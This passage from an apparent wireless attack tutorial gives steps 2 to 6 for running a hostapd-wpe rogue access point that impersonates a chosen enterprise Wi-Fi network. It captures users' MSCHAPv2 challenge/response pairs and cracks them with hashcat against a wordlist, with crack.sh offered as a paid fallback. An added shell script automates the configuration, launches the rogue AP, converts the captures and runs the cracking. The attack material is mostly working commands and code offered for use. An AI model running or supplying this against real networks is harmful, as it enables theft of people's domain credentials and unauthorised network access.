2. Edit the hostapd-wpe.conf file and set the ssid variable to the name of the network you want to impersonate; the remaining packaged defaults shown below are usually fine. Note that the certificate and eap_user paths in this file are relative, so either run hostapd-wpe from the directory they resolve against or change them to absolute paths:
nano /etc/hostapd-wpe/hostapd-wpe.conf
#
# hostapd-wpe.conf
# Brad Antoniewicz (@brad_anton) - Foundstone
# ------------------------------------------------
#
# Configuration file for hostapd-wpe
#
# General Options - Likely to need to be changed if you're using this
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan0
# Driver - comment this out if 802.11
#driver=wired
# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca.pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh
# 802.11 Options - Uncomment all if 802.11
ssid=hostapd-wpe
hw_mode=g
channel=1
3. Kill processes such as wpa_supplicant and NetworkManager that would otherwise hold the interface and interfere with the access point. airmon-ng check only lists them; the kill argument actually stops them:
sudo airmon-ng check kill
4. Run the rogue access point and wait for clients to connect. Only clients that do not validate the RADIUS server certificate (or whose users click through the certificate warning) will complete the inner EAP exchange and hand over their MSCHAPv2 challenge/response:
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
5. For each connection hostapd-wpe prints the captured MSCHAPv2 challenge/response, including a ready-made hashcat NETNTLM line of the form user::::response:challenge. Save those lines to a file (hashes.txt here) and crack them with Hashcat mode 5500 (NetNTLMv1/MSCHAPv2) and a wordlist:
hashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
6. If the hash does not crack locally, it can be submitted to crack.sh, which will crack it for a price:
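The procedure in steps 2 to 5, wrapped in shell functions as an added example; this is not code from the original page or from the hostapd-wpe project. It assumes the Kali config path /etc/hostapd-wpe/hostapd-wpe.conf, the rockyou wordlist path, and a log layout modelled on the username/challenge/response block hostapd-wpe prints for each capture. The sample log and its hex values are constructed and match no real password. The converter goes slightly beyond the page's single case: it also splits a DOMAIN\user username into hashcat's separate user and domain fields.

```shell
#!/bin/sh
# Added example (not from the original page or the hostapd-wpe project):
# wraps steps 2 to 5 above in reusable functions. Assumptions: the Kali
# config path, the wordlist path, and the log layout in sample_log below,
# modelled on the per-capture block hostapd-wpe prints.

CONF=/etc/hostapd-wpe/hostapd-wpe.conf      # assumed packaged config
WORDLIST=/usr/share/wordlists/rockyou.txt   # assumed wordlist

# Step 2: write a copy of the template config with the ssid replaced,
# leaving the packaged file untouched.   make_conf <template> <ssid> <out>
make_conf() {
    sed "s|^ssid=.*|ssid=$2|" "$1" > "$3"
}

# Steps 3 and 4: free the interface and start the rogue AP. Not invoked at
# load time because it needs root and a wireless card.   run_ap <conf>
run_ap() {
    airmon-ng check kill
    hostapd-wpe "$1"
}

# Step 5: turn the "username:/challenge:/response:" lines hostapd-wpe prints
# for each capture (read from stdin) into hashcat -m 5500 lines of the form
# user::domain::response:challenge, dropping the colons between hex bytes.
# A DOMAIN\user username is split so hashcat gets the bare user name;
# without a domain the line is user::::response:challenge, exactly the
# "hashcat NETNTLM:" line hostapd-wpe itself prints.
to_hashcat() {
    awk '
        /^[[:space:]]*username:/  { user = $2; dom = ""
                                    n = index(user, "\\")
                                    if (n) { dom = substr(user, 1, n - 1)
                                             user = substr(user, n + 1) } }
        /^[[:space:]]*challenge:/ { chal = $2; gsub(":", "", chal) }
        /^[[:space:]]*response:/  { resp = $2; gsub(":", "", resp)
                                    if (user != "")
                                        printf "%s::%s::%s:%s\n", user, dom, resp, chal
                                    user = "" }
    '
}

# Step 5, continued: crack every capture in a hostapd-wpe log.   crack <logfile>
crack() {
    to_hashcat < "$1" > hashes.txt
    hashcat -m 5500 -a 0 hashes.txt "$WORDLIST"
}

# Constructed sample log in hostapd-wpe's layout. The challenge and response
# bytes are made up and correspond to no real password.
sample_log() {
cat <<'EOF'
mschapv2: Mon Jan  1 00:00:00 2024
	 username:	CORP\alice
	 challenge:	0a:1b:2c:3d:4e:5f:60:71
	 response:	00:01:02:03:04:05:06:07:08:09:0a:0b:0c:0d:0e:0f:10:11:12:13:14:15:16:17
mschapv2: Mon Jan  1 00:00:05 2024
	 username:	bob
	 challenge:	ff:ee:dd:cc:bb:aa:99:88
	 response:	17:16:15:14:13:12:11:10:0f:0e:0d:0c:0b:0a:09:08:07:06:05:04:03:02:01:00
EOF
}

# Usage (as root, with a wireless interface present):
#   make_conf "$CONF" CorpWiFi /tmp/wpe.conf && run_ap /tmp/wpe.conf
#   ... after captures, in a second shell, using the log hostapd-wpe writes:
#   crack hostapd-wpe.log
# Offline dry run of the converter alone:
#   sample_log | to_hashcat
```

The converter rebuilds the hashcat line from the raw challenge and response fields rather than grepping hostapd-wpe's own "hashcat NETNTLM:" line, so it also works on logs where only the raw fields were kept. The challenge it emits is the 8-byte derived MSCHAPv2 challenge hostapd-wpe already computed, which is why mode 5500 (NetNTLMv1) applies directly.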